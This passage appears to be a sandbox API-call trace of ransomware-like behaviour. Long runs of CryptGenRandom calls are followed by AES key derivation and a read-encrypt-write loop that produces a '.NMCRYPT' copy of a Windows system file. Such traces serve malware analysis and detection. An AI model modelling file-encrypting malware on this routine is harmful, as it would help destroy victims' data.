CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.335] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.336] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.336] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0159.337] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0159.337] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.337] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad238) returned 1 [0159.337] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0159.337] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0159.337] wcslen (_String="\\\\?\\") returned 0x4 [0159.337] CryptDuplicateKey (in: hKey=0x9ad238, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad478) returned 1 [0159.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0159.337] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\nl-NL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nl-nl\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0159.337] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0159.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0159.338] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.339] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.339] GetLastError () returned 0x0 [0159.339] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.399] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.400] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.400] GetLastError () returned 0x0 [0159.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.400] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.400] GetLastError () returned 0x0 [0159.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.400] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.400] GetLastError () returned 0x0 [0159.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.400] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.400] GetLastError () returned 0x0 [0159.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.400] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.400] GetLastError () returned 0x0 [0159.400] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.400] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.400] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.401] GetLastError () returned 0x0 [0159.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.401] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.401] GetLastError () returned 0x0 [0159.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.401] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.401] GetLastError () returned 0x0 [0159.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.401] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.401] GetLastError () returned 0x0 [0159.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.401] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.401] GetLastError () returned 0x0 [0159.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.401] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.401] GetLastError () returned 0x0 [0159.401] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.401] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.401] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.402] GetLastError () returned 0x0 [0159.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.402] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.402] GetLastError () returned 0x0 [0159.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.402] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.402] GetLastError () returned 0x0 [0159.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.402] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.402] GetLastError () returned 0x0 [0159.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.402] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.402] GetLastError () returned 0x0 [0159.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0159.402] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0159.402] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0159.402] GetLastError () returned 0x0 [0159.402] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, 